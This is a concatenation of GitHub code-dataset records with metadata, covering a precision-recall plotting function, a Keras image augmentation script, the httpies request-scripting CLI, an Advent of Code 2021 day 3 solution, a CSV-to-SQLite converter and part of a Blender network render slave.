markeredgewidth=2,\n label=label +\n f' (R = {np.round(_recall[category_id][0], 3)})',\n c=c,\n )\n ax.hlines(\n y=_precision[category_id][0],\n xmin=np.min(rec),\n xmax=np.max(rec),\n linestyles='dashed',\n colors=c,\n )\n ax.text(\n x=_recall[category_id][0], y=_precision[category_id][0],\n s=f' R = {np.round(_recall[category_id][0], 3)}',\n fontdict={'fontsize': 20, 'fontweight': 'bold'},\n )\n ins.hlines(\n y=_precision[category_id][0],\n xmin=np.min(rec),\n xmax=np.max(rec),\n linestyles='dashed',\n colors=c,\n )\n\n if plot_title:\n box = ax.get_position()\n ax.set_position([box.x0, box.y0, box.width * 0.8, box.height])\n\n ax.legend(\n loc='lower left', bbox_to_anchor=(.65, .1),\n fancybox=True, shadow=True, ncol=1, fontsize=30,\n )\n\n ax.set_title(plot_title, fontdict={'fontsize': 35})\n ax.set_ylabel(\n 'Precision', fontdict={\n 'fontsize': 30,\n },\n )\n ax.set_xlabel('Recall', fontdict={'fontsize': 30})\n\n ax.tick_params(axis='both', which='major', labelsize=30)\n ins.tick_params(axis='both', which='major', labelsize=20)\n\n if bounds is not None:\n x_min, x_max, _, _ = bounds\n ax.set_xlim([x_min, x_max])\n else:\n ax.set_xlim([.7, 1.0])\n ax.set_ylim(bottom=0.05, 
top=1.02)\n fig.tight_layout()\n fig.savefig(plot_output_path, dpi=150)\n else:\n return precision, recall\n", "repo_name": "qbeer/coco-froc-analysis", "sub_path": "coco_froc_analysis/count/count_curve.py", "file_name": "count_curve.py", "file_ext": "py", "file_size_in_byte": 5978, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 9, "dataset": "github-code", "pt": "52", "api": [{"api_name": "utils.load_json_from_file", "line_number": 18, "usage_type": "call"}, {"api_name": "utils.load_json_from_file", "line_number": 19, "usage_type": "call"}, {"api_name": "utils.update_scores", "line_number": 21, "usage_type": "call"}, {"api_name": "count_stats.init_stats", "line_number": 25, "usage_type": "call"}, {"api_name": "utils.build_gt_id2annotations", "line_number": 27, "usage_type": "call"}, {"api_name": "utils.build_pr_id2annotations", "line_number": 28, "usage_type": "call"}, {"api_name": "count_stats.update_stats", "line_number": 30, "usage_type": "call"}, {"api_name": "tqdm.auto.tqdm", "line_number": 71, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 72, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 78, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 78, "usage_type": "name"}, {"api_name": "utils.COLORS", "line_number": 110, "usage_type": "argument"}, {"api_name": "utils.transform_gt_into_pr", "line_number": 112, "usage_type": "call"}, {"api_name": "numpy.round", "line_number": 123, "usage_type": "call"}, {"api_name": "numpy.round", "line_number": 133, "usage_type": "call"}, {"api_name": "numpy.min", "line_number": 138, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 139, "usage_type": "call"}, {"api_name": "numpy.round", "line_number": 145, "usage_type": "call"}, {"api_name": "numpy.min", "line_number": 150, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 151, "usage_type": "call"}]} +{"seq_id": "4583903855", "text": "import keras.preprocessing.image\nfrom keras_preprocessing.image import ImageDataGenerator\nfrom skimage import io\n\n\ndata_gen = ImageDataGenerator (\n rotation_range =45 , #ratate between 0-45 degrees\n width_shift_range=0.2,\n height_shift_range=0.2,\n zoom_range=0.2,\n horizontal_flip=True,\n fill_mode='constant',cval=125 #fills nearest remaining pixels with 125 with grey pixels\n\n)\n\nx = io.imread('mars_crater.jpg')\n\nx=x.reshape((1, )+ x.shape)\n\ni = 0\nfor batch in data_gen.flow(x, batch_size=16, #creates 16 images at once\n save_to_dir='imageAugm',\n save_prefix='aug',\n save_format='png'):\n i += 1\n if i > 20:\n break", "repo_name": "Sound245939/AICV", "sub_path": "data_aug.py", "file_name": "data_aug.py", "file_ext": "py", "file_size_in_byte": 724, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "keras_preprocessing.image.ImageDataGenerator", "line_number": 6, "usage_type": "call"}, {"api_name": "skimage.io.imread", "line_number": 16, "usage_type": "call"}, {"api_name": "skimage.io", "line_number": 16, "usage_type": "name"}]} +{"seq_id": "70233801766", "text": "from pprint import pprint\nfrom time import sleep\nfrom typing import List, Union\nimport os\nimport sys\nimport configparser\nimport argparse\nimport logging\nimport shlex\nimport subprocess\n\nfrom httpie import core as httpie\n\n\n\n\ndef main(args: List[Union[str, bytes]] = sys.argv):\n module_dir = os.path.dirname(os.path.abspath(__file__))\n base_dir = os.getenv('HTTPIES_BASEDIR', 
False)\n    args, urlscript_args = parse_args()\n    log_level = args.verbose\n    logging.basicConfig(format='%(levelname)s:%(message)s', level=log_level)\n\n    if base_dir is False:\n        logging.critical('$HTTPIES_BASEDIR not set, please add HTTPIES_BASEDIR to your environment variables.')\n        sys.exit(-1)\n\n    config = parse_config(module_dir, base_dir)\n\n    props = merge_config(config, args)\n    logging.debug(\"using base_dir: %s\" % props['base_dir'])\n\n    pprint(props)\n\n    if not os.path.isdir(props['base_dir']):\n        logging.critical('- Base_dir \"%s\" does not exist, exiting' % props['base_dir'])\n        sys.exit(-1)\n    exec_props = find_executable(props, config)\n\n\n    httpie_args = exec_url_script(exec_props, get_script_args(urlscript_args))\n    logging.info(\"your url-script returned:\")\n    logging.info(httpie_args.decode('utf-8'))\n\n\n    if exec_props['watch'] is None:\n        exit_status = exec_request(httpie_args)\n        sys.exit(exit_status)\n    else:\n        while True:\n            exec_request(httpie_args)\n            print(f\"--Re-executing every {exec_props['watch']} seconds--\\n\")\n            sleep(int(exec_props['watch']))\n\n\n\n\ndef parse_args():\n    arg_parser = argparse.ArgumentParser(\n        prog=\"httpies\",\n        description=\"Script httpie requests and execute them by url.\",\n        epilog=\"Add \\\"param=value\\\" pairs to the command to pass arguments to your url scripts (used for GET/POST values). \\n\"\n               \"To UNSET a parameter that is set within your url script, use \\\"param=None\\\"\",\n        usage=\"%(prog)s get.py /user/profile script_arg_1=value script_arg_2=value script_unset_value=None\"\n    )\n\n    arg_parser.add_argument('method', choices=['get', 'post', 'put', 'patch', 'delete'], help=\"Http request method\")\n    arg_parser.add_argument('url', help=\"The url to request (e.g. /user/profile)\")\n    arg_parser.add_argument('-w', '--watch', help=\"Internal watch replacement, execute the command every [x] seconds until killed\")\n    arg_parser.add_argument('-c', '--config', help=\"Set config file to read\")\n    arg_parser.add_argument('-b', '--basedir',\n                            help=\"Set the url script base dir, will overwrite config file and environment\")\n    arg_parser.add_argument('-d', '--domain', help=\"Used to override the domain (e.g. 
https://example.com)\")\n arg_parser.add_argument('-v', '--verbose',\n help=\"Set log-level (10=debug, 50=critical)\",\n type=int,\n default=logging.WARNING,\n choices=[logging.DEBUG, logging.INFO, logging.WARNING, logging.ERROR, logging.CRITICAL]\n )\n args, script_args = arg_parser.parse_known_args()\n return args, script_args\n\n\ndef parse_config(module_dir, base_dir):\n base_file = os.path.join(base_dir, 'httpies.conf')\n mod_file = os.path.join(module_dir, 'httpies.conf')\n if not os.path.isfile(base_file):\n logging.info(\n \"Reading config from %s, you can overwrite this by adding httpies.conf to your base_dir\" % mod_file\n )\n\n config = configparser.RawConfigParser()\n config.read([mod_file, base_file])\n return config\n\n\ndef merge_config(config, args):\n props = {\n \"base_dir\":os.getenv('HTTPIES_BASEDIR'),\n \"executable\": config.get('global', 'httpie_executable_name'),\n \"method\": args.method,\n \"domain\": args.domain if args.domain else os.getenv('HTTPIES_DEFAULT_DOMAIN',\n config.get('global', 'default_domain')\n ),\n \"url\": args.url,\n \"script_file\": None,\n \"verbose\": args.verbose,\n \"watch\": args.watch\n }\n if args.basedir:\n props['base_dir'] = os.path.realpath(args.basedir)\n\n url = props['url']\n if url[0] == '/':\n url = url[1:]\n\n props['script_file'] = os.path.join(props['base_dir'],\n config.get('global', 'url_script_dir'),\n url,\n props['method'].lower()\n )\n return props\n\n\ndef get_script_args(script_args):\n return_list = []\n dashes = '--'\n for arg in script_args:\n splitted = arg.split('=', 1)\n if len(splitted) == 2:\n return_list.append(\"%s=%s\" % (splitted[0], shlex.quote(splitted[1]),))\n else:\n return_list.append(\"%s%s\" % (dashes, shlex.quote(arg)))\n if dashes == '':\n dashes = '--'\n else:\n dashes = ''\n return return_list\n\n\ndef find_executable(props, config):\n logging.info(\"Looking for url-script: %s\" % props['script_file'])\n if os.path.isfile(props['script_file']):\n if not os.access(props['script_file'], os.X_OK):\n if config.get('global', 'chmod_url_scripts') == 'yes':\n logging.warning('Script file is not executable, running \"chmod 0777 %s\"' % props['script_file'])\n os.system('chmod 0755 %s' % props['script_file'])\n if not os.access(props['script_file'], os.X_OK):\n logging.critical('Script is not executable, exiting')\n sys.exit(-1)\n else:\n logging.critical('Script is not executable, exiting')\n sys.exit(-1)\n logging.info(\"Found: %s\" % props['script_file'])\n return props\n\n elements = dict(config.items('executables'))\n for ext, exe in elements.items():\n new_path = \"%s.%s\" % (props['script_file'], ext,)\n logging.debug('Trying: %s' % new_path)\n if os.path.isfile(new_path):\n props['exec_with'] = exe.replace('[HTTPIES_BASEDIR]', props['base_dir'])\n props['script_file'] = new_path\n logging.info(\"Found: %s\" % props['script_file'])\n return props\n\n logging.critical('- %s does not exist, exiting' % props['script_file'])\n sys.exit(-1)\n\ndef exec_url_script(props, script_args):\n command_list = [\n props['script_file'],\n '%s' % shlex.quote(props['method'].upper()),\n '\"%s\"' % shlex.quote(props['domain']),\n '\"%s\"' % shlex.quote(props['url'])\n\n ]\n if props['exec_with']:\n command_list.insert(0, props['exec_with'])\n\n command_list.extend(script_args)\n logging.info(\"Executing: %s\" % \" \".join(command_list))\n proc = subprocess.Popen(\" \".join(command_list), shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n \n stdout, stderr = proc.communicate()\n if len(stderr) > 0:\n 
logging.critical('%s : %s ' % (props['script_file'], stderr))\n if proc.returncode != 0:\n logging.critical('Url-script returned a non-zero exitcode, it returned \"%s\"', proc.returncode)\n logging.critical(\"tried to execute: %s\" % \" \".join(command_list))\n # I really just wanna dump the contents of the script... for debugging\n # @todo is this how we wanna do this.\n if props['verbose'] < 50:\n print(\"\\n DISABLE THIS MESSAGE using -v 50\")\n print(\"The stdout from your url-script was: \\n\")\n print(\"%s\" % stdout.decode(\"utf-8\"))\n print(\"The stderr from your url-script was: \\n\")\n print(\"%s\" % stderr.decode(\"utf-8\"))\n sys.exit(proc.returncode)\n\n return stdout\n\ndef exec_request(httpie_args):\n args = httpie_args.splitlines()\n args = [x.strip() for x in args]\n httpie.main(args)\n\n", "repo_name": "FlipVernooij/httpies", "sub_path": "httpies/core.py", "file_name": "core.py", "file_ext": "py", "file_size_in_byte": 8072, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "typing.List", "line_number": 17, "usage_type": "name"}, {"api_name": "typing.Union", "line_number": 17, "usage_type": "name"}, {"api_name": "sys.argv", "line_number": 17, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 18, "usage_type": "call"}, {"api_name": "os.path", "line_number": 18, "usage_type": "attribute"}, {"api_name": "os.path.abspath", "line_number": 18, "usage_type": "call"}, {"api_name": "os.getenv", "line_number": 19, "usage_type": "call"}, {"api_name": "logging.basicConfig", "line_number": 22, "usage_type": "call"}, {"api_name": "logging.critical", "line_number": 25, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 26, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 31, "usage_type": "call"}, {"api_name": "pprint.pprint", "line_number": 33, "usage_type": "call"}, {"api_name": "os.path.isdir", "line_number": 35, "usage_type": "call"}, {"api_name": "os.path", "line_number": 35, "usage_type": "attribute"}, {"api_name": "logging.critical", "line_number": 36, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 37, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 42, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 43, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 48, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 53, "usage_type": "call"}, {"api_name": "argparse.ArgumentParser", "line_number": 59, "usage_type": "call"}, {"api_name": "logging.WARNING", "line_number": 77, "usage_type": "attribute"}, {"api_name": "logging.DEBUG", "line_number": 78, "usage_type": "attribute"}, {"api_name": "logging.INFO", "line_number": 78, "usage_type": "attribute"}, {"api_name": "logging.WARNING", "line_number": 78, "usage_type": "attribute"}, {"api_name": "logging.ERROR", "line_number": 78, "usage_type": "attribute"}, {"api_name": "logging.CRITICAL", "line_number": 78, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 85, "usage_type": "call"}, {"api_name": "os.path", "line_number": 85, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 86, "usage_type": "call"}, {"api_name": "os.path", "line_number": 86, "usage_type": "attribute"}, {"api_name": "os.path.isfile", "line_number": 87, "usage_type": "call"}, {"api_name": "os.path", "line_number": 87, "usage_type": "attribute"}, {"api_name": "logging.info", "line_number": 88, "usage_type": "call"}, 
{"api_name": "configparser.RawConfigParser", "line_number": 92, "usage_type": "call"}, {"api_name": "os.getenv", "line_number": 99, "usage_type": "call"}, {"api_name": "os.getenv", "line_number": 102, "usage_type": "call"}, {"api_name": "os.path.realpath", "line_number": 111, "usage_type": "call"}, {"api_name": "os.path", "line_number": 111, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 117, "usage_type": "call"}, {"api_name": "os.path", "line_number": 117, "usage_type": "attribute"}, {"api_name": "shlex.quote", "line_number": 131, "usage_type": "call"}, {"api_name": "shlex.quote", "line_number": 133, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 142, "usage_type": "call"}, {"api_name": "os.path.isfile", "line_number": 143, "usage_type": "call"}, {"api_name": "os.path", "line_number": 143, "usage_type": "attribute"}, {"api_name": "os.access", "line_number": 144, "usage_type": "call"}, {"api_name": "os.X_OK", "line_number": 144, "usage_type": "attribute"}, {"api_name": "logging.warning", "line_number": 146, "usage_type": "call"}, {"api_name": "os.system", "line_number": 147, "usage_type": "call"}, {"api_name": "os.access", "line_number": 148, "usage_type": "call"}, {"api_name": "os.X_OK", "line_number": 148, "usage_type": "attribute"}, {"api_name": "logging.critical", "line_number": 149, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 150, "usage_type": "call"}, {"api_name": "logging.critical", "line_number": 152, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 153, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 154, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 160, "usage_type": "call"}, {"api_name": "os.path.isfile", "line_number": 161, "usage_type": "call"}, {"api_name": "os.path", "line_number": 161, "usage_type": "attribute"}, {"api_name": "logging.info", "line_number": 164, "usage_type": "call"}, {"api_name": "logging.critical", "line_number": 167, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 168, "usage_type": "call"}, {"api_name": "shlex.quote", "line_number": 173, "usage_type": "call"}, {"api_name": "shlex.quote", "line_number": 174, "usage_type": "call"}, {"api_name": "shlex.quote", "line_number": 175, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 182, "usage_type": "call"}, {"api_name": "subprocess.Popen", "line_number": 183, "usage_type": "call"}, {"api_name": "subprocess.PIPE", "line_number": 183, "usage_type": "attribute"}, {"api_name": "logging.critical", "line_number": 187, "usage_type": "call"}, {"api_name": "logging.critical", "line_number": 189, "usage_type": "call"}, {"api_name": "logging.critical", "line_number": 190, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 199, "usage_type": "call"}, {"api_name": "httpie.core.main", "line_number": 206, "usage_type": "call"}, {"api_name": "httpie.core", "line_number": 206, "usage_type": "name"}]} +{"seq_id": "27262056456", "text": "# -*- coding: utf-8 -*-\n\"\"\"\n@author: wapisani\n\"\"\"\n\nimport os\nimport numpy as np\nfrom collections import Counter\n\ndirectory = r'F:\\Documents\\Programming\\AoC\\2021'\nos.chdir(directory)\n\nwith open('input_day3.txt','r') as handle:\n data = handle.readlines()\n\n# Test data\n# data = ['00100','11110','10110','10111','10101','01111','00111','11100','10000','11001','00010','01010']\n\ndata = [line.strip() for line in data]\n# Store bits in array so that they're easily accessed later\nrows, cols = len(data), 
len(data[0])\nstorage_array = np.zeros((rows,cols))\nfor i,line in enumerate(data):\n for j,bit in enumerate(line):\n bit = int(bit)\n storage_array[i,j] = bit\n\n### Part 1 ###\ngamma = ''\nepsilon = ''\ncommon_bits = ''\nfor col in range(cols):\n count = Counter(storage_array[:,col])\n zero_count = count[0.0]\n one_count = count[1.0]\n \n if zero_count > one_count:\n gamma += '0'\n epsilon += '1'\n common_bits += '0'\n elif one_count > zero_count:\n gamma += '1'\n epsilon += '0'\n common_bits += '1'\n else:\n common_bits += '='\n \n \nprint(f'Power consumption is {int(gamma,2)*int(epsilon,2)}')\n \n### Part 2 ###\n# Check for oxygen generator rating\ndef CheckCommonality(lines,col):\n \"\"\"\n This function will check for the commonality of 1's vs 0's for a list\n of lines (given as lines) for a specific column position (given as col)\n and return which is greater or if they're equal.\n\n Parameters\n ----------\n lines : list\n list of strings of binary numbers.\n col : int\n column position.\n\n Returns\n -------\n '1', '0', or '='.\n\n \"\"\"\n rows, cols = len(lines), len(lines[0])\n storage_array = np.zeros((rows,cols))\n for i,line in enumerate(lines):\n for j,bit in enumerate(line):\n bit = int(bit)\n storage_array[i,j] = bit\n \n count = Counter(storage_array[:,col])\n zero_count = count[0.0]\n one_count = count[1.0]\n \n if zero_count > one_count:\n return '0'\n \n elif one_count > zero_count:\n return '1'\n \n else:\n return '='\n \ndata_o2 = data[:]\nfor col in range(cols):\n if col > 0:\n more_common = CheckCommonality(data_o2, col)\n else:\n more_common = common_bits[col]\n if len(data_o2) == 1:\n break\n \n for line in data:\n if line not in data_o2:\n continue\n bit = line[col]\n if more_common == '=':\n if bit != '1':\n data_o2.remove(line)\n continue\n else:\n if bit != more_common:\n data_o2.remove(line)\n continue\no2 = int(data_o2[0],2)\n\ndata_co2 = data[:]\nfor col in range(cols):\n if col > 0:\n more_common = CheckCommonality(data_co2, col)\n else:\n more_common = common_bits[col]\n if len(data_co2) == 1:\n break\n \n for line in data:\n if line not in data_co2:\n continue\n bit = line[col]\n if more_common == '=':\n if bit != '0':\n data_co2.remove(line)\n continue\n else:\n if bit == more_common:\n data_co2.remove(line)\n continue\nco2 = int(data_co2[0],2)\n\nprint(f'Life support rating is {co2*o2}')\n", "repo_name": "wapisani/AoC", "sub_path": "2021/day3.py", "file_name": "day3.py", "file_ext": "py", "file_size_in_byte": 3311, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "os.chdir", "line_number": 11, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 22, "usage_type": "call"}, {"api_name": "collections.Counter", "line_number": 33, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 72, "usage_type": "call"}, {"api_name": "collections.Counter", "line_number": 78, "usage_type": "call"}]} +{"seq_id": "73178097445", "text": "import csv\r\nimport io\r\nimport pathlib\r\nimport sqlite3\r\nimport tkinter.filedialog\r\nfrom tkinter import Tk\r\n\r\n\r\ndef show_file_opener_dialog():\r\n tk = Tk()\r\n tk.withdraw()\r\n return tkinter.filedialog.Open(tk,\r\n title=\"Choose the file to convert\",\r\n filetypes=[('CSV files', '.csv')]).show()\r\n\r\n\r\ndef show_save_as_dialog():\r\n tk = Tk()\r\n tk.withdraw()\r\n return tkinter.filedialog.SaveAs(tk,\r\n title=\"Choose the name of the converted file\",\r\n filetypes=[('SQL DB file', '.db')],\r\n 
defaultextension=\"db\").show()\r\n\r\n\r\ndef process_file(csv_path, db_path):\r\n with open(csv_path, mode='r', encoding='utf8') as reader:\r\n csv_reader = csv.reader(reader)\r\n first_row_read = False\r\n connection = sqlite3.connect(db_path)\r\n\r\n print('Starting...')\r\n for row in csv_reader:\r\n if not first_row_read:\r\n table_name = pathlib.Path(csv_path).name.split(\".\")[0]\r\n stringio = io.StringIO()\r\n for column in row:\r\n stringio.write(f'{column} TEXT, ')\r\n column_statement = stringio.getvalue().rstrip(', ')\r\n connection.execute(f'DROP TABLE IF EXISTS {table_name}')\r\n connection.execute(f'CREATE TABLE {table_name} ({column_statement})')\r\n first_row_read = True\r\n stringio.close()\r\n else:\r\n for i in range(0, len(row)):\r\n row[i] = f\"'{row[i]}'\"\r\n row_values = ', '.join(row)\r\n connection.execute(f'INSERT INTO {table_name} VALUES ({row_values})')\r\n\r\n print('Wrapping up...')\r\n connection.commit()\r\n print('Finished!')\r\n connection.close()\r\n\r\n\r\nif __name__ == '__main__':\r\n process_file(show_file_opener_dialog(), show_save_as_dialog())\r\n", "repo_name": "asaiahdev777/CSV2SQLite", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 1996, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "tkinter.Tk", "line_number": 10, "usage_type": "call"}, {"api_name": "tkinter.filedialog.filedialog.Open", "line_number": 12, "usage_type": "call"}, {"api_name": "tkinter.filedialog.filedialog", "line_number": 12, "usage_type": "attribute"}, {"api_name": "tkinter.filedialog", "line_number": 12, "usage_type": "name"}, {"api_name": "tkinter.Tk", "line_number": 18, "usage_type": "call"}, {"api_name": "tkinter.filedialog.filedialog.SaveAs", "line_number": 20, "usage_type": "call"}, {"api_name": "tkinter.filedialog.filedialog", "line_number": 20, "usage_type": "attribute"}, {"api_name": "tkinter.filedialog", "line_number": 20, "usage_type": "name"}, {"api_name": "csv.reader", "line_number": 28, "usage_type": "call"}, {"api_name": "sqlite3.connect", "line_number": 30, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 35, "usage_type": "call"}, {"api_name": "io.StringIO", "line_number": 36, "usage_type": "call"}]} +{"seq_id": "72248308645", "text": "# ##### BEGIN GPL LICENSE BLOCK #####\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software Foundation,\n# Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.\n#\n# ##### END GPL LICENSE BLOCK #####\n\nimport sys, os, platform, shutil\nimport http, http.client, http.server\nimport subprocess, time\nimport json\n\nimport bpy\n\nfrom netrender.utils import *\nimport netrender.model\nimport netrender.repath\nimport netrender.thumbnail as thumbnail\n\nBLENDER_PATH = sys.argv[0]\n\nCANCEL_POLL_SPEED = 2\nMAX_TIMEOUT = 10\nINCREMENT_TIMEOUT = 1\nMAX_CONNECT_TRY = 10\ntry:\n system = platform.system()\nexcept UnicodeDecodeError:\n import sys\n system = sys.platform\n\nif system in ('Windows', 'win32') and platform.version() >= '5': # Error mode is only available on Win2k or higher, that's version 5\n import ctypes\n def SetErrorMode():\n val = ctypes.windll.kernel32.SetErrorMode(0x0002)\n ctypes.windll.kernel32.SetErrorMode(val | 0x0002)\n return val\n\n def RestoreErrorMode(val):\n ctypes.windll.kernel32.SetErrorMode(val)\nelse:\n def SetErrorMode():\n return 0\n\n def RestoreErrorMode(val):\n pass\n\ndef clearSlave(path):\n shutil.rmtree(path)\n\ndef slave_Info():\n sysname, nodename, release, version, machine, processor = platform.uname()\n slave = netrender.model.RenderSlave()\n slave.name = nodename\n slave.stats = sysname + \" \" + release + \" \" + machine + \" \" + processor\n return slave\n\ndef testCancel(conn, job_id, frame_number):\n conn.request(\"HEAD\", \"/status\", headers={\"job-id\":job_id, \"job-frame\": str(frame_number)})\n\n # canceled if job isn't found anymore\n if responseStatus(conn) == http.client.NO_CONTENT:\n return True\n else:\n return False\n\ndef testFile(conn, job_id, slave_id, rfile, JOB_PREFIX, main_path = None):\n job_full_path = prefixPath(JOB_PREFIX, rfile.filepath, main_path)\n \n found = os.path.exists(job_full_path)\n \n if found and rfile.signature != None:\n found_signature = hashFile(job_full_path)\n found = found_signature == rfile.signature\n \n if not found:\n print(\"Found file %s at %s but signature mismatch!\" % (rfile.filepath, job_full_path))\n os.remove(job_full_path)\n job_full_path = prefixPath(JOB_PREFIX, rfile.filepath, main_path, force = True)\n\n if not found:\n # Force prefix path if not found\n job_full_path = prefixPath(JOB_PREFIX, rfile.filepath, main_path, force = True)\n temp_path = os.path.join(JOB_PREFIX, \"slave.temp\")\n conn.request(\"GET\", fileURL(job_id, rfile.index), headers={\"slave-id\":slave_id})\n response = conn.getresponse()\n\n if response.status != http.client.OK:\n return None # file for job not returned by server, need to return an error code to server\n\n f = open(temp_path, \"wb\")\n buf = response.read(1024)\n\n while buf:\n f.write(buf)\n buf = response.read(1024)\n\n f.close()\n\n os.renames(temp_path, job_full_path)\n \n rfile.filepath = job_full_path\n\n return job_full_path\n\ndef breakable_timeout(timeout):\n for i in range(timeout):\n time.sleep(1)\n if engine.test_break():\n break\n\ndef render_slave(engine, netsettings, threads):\n # timeout = 1 # UNUSED\n \n bisleep = BreakableIncrementedSleep(INCREMENT_TIMEOUT, 1, MAX_TIMEOUT, engine.test_break)\n\n engine.update_stats(\"\", \"Network render node initiation\")\n \n slave_path = bpy.path.abspath(netsettings.path)\n\n if not os.path.exists(slave_path):\n print(\"Slave working path ( %s ) doesn't exist\" % netsettings.path)\n return\n\n if 
not os.access(slave_path, os.W_OK):\n print(\"Slave working path ( %s ) is not writable\" % netsettings.path)\n return\n\n conn = clientConnection(netsettings.server_address, netsettings.server_port)\n \n if not conn:\n # timeout = 1 # UNUSED\n print(\"Connection failed, will try connecting again at most %i times\" % MAX_CONNECT_TRY)\n bisleep.reset()\n \n for i in range(MAX_CONNECT_TRY):\n bisleep.sleep()\n \n conn = clientConnection(netsettings.server_address, netsettings.server_port)\n \n if conn or engine.test_break():\n break\n \n print(\"Retry %i failed, waiting %is before retrying\" % (i + 1, bisleep.current))\n \n if conn:\n conn.request(\"POST\", \"/slave\", json.dumps(slave_Info().serialize()))\n response = conn.getresponse()\n response.read()\n\n slave_id = response.getheader(\"slave-id\")\n\n NODE_PREFIX = os.path.join(slave_path, \"slave_\" + slave_id)\n if not os.path.exists(NODE_PREFIX):\n os.mkdir(NODE_PREFIX)\n\n engine.update_stats(\"\", \"Network render connected to master, waiting for jobs\")\n\n while not engine.test_break():\n conn.request(\"GET\", \"/job\", headers={\"slave-id\":slave_id})\n response = conn.getresponse()\n\n if response.status == http.client.OK:\n bisleep.reset()\n\n job = netrender.model.RenderJob.materialize(json.loads(str(response.read(), encoding='utf8')))\n engine.update_stats(\"\", \"Network render processing job from master\")\n\n JOB_PREFIX = os.path.join(NODE_PREFIX, \"job_\" + job.id)\n if not os.path.exists(JOB_PREFIX):\n os.mkdir(JOB_PREFIX)\n\n # set tempdir for fsaa temp files\n # have to set environ var because render is done in a subprocess and that's the easiest way to propagate the setting\n os.environ[\"TMP\"] = JOB_PREFIX\n\n\n if job.type == netrender.model.JOB_BLENDER:\n job_path = job.files[0].filepath # path of main file\n main_path, main_file = os.path.split(job_path)\n\n job_full_path = testFile(conn, job.id, slave_id, job.files[0], JOB_PREFIX)\n print(\"Fullpath\", job_full_path)\n print(\"File:\", main_file, \"and %i other files\" % (len(job.files) - 1,))\n\n for rfile in job.files[1:]:\n testFile(conn, job.id, slave_id, rfile, JOB_PREFIX, main_path)\n print(\"\\t\", rfile.filepath)\n \n netrender.repath.update(job)\n\n engine.update_stats(\"\", \"Render File \"+ main_file+ \" for job \"+ job.id)\n elif job.type == netrender.model.JOB_VCS:\n if not job.version_info:\n # Need to return an error to server, incorrect job type\n pass\n \n job_path = job.files[0].filepath # path of main file\n main_path, main_file = os.path.split(job_path)\n \n job.version_info.update()\n \n # For VCS jobs, file path is relative to the working copy path\n job_full_path = os.path.join(job.version_info.wpath, job_path)\n \n engine.update_stats(\"\", \"Render File \"+ main_file+ \" for job \"+ job.id)\n\n # announce log to master\n logfile = netrender.model.LogFile(job.id, slave_id, [frame.number for frame in job.frames])\n conn.request(\"POST\", \"/log\", bytes(json.dumps(logfile.serialize()), encoding='utf8'))\n response = conn.getresponse()\n response.read()\n\n\n first_frame = job.frames[0].number\n\n # start render\n start_t = time.time()\n\n if job.rendersWithBlender():\n frame_args = []\n\n for frame in job.frames:\n print(\"frame\", frame.number)\n frame_args += [\"-f\", str(frame.number)]\n\n val = SetErrorMode()\n process = subprocess.Popen([BLENDER_PATH, \"-b\", \"-noaudio\", job_full_path, \"-t\", str(threads), \"-o\", os.path.join(JOB_PREFIX, \"######\"), \"-E\", \"BLENDER_RENDER\", \"-F\", \"MULTILAYER\"] + frame_args, 
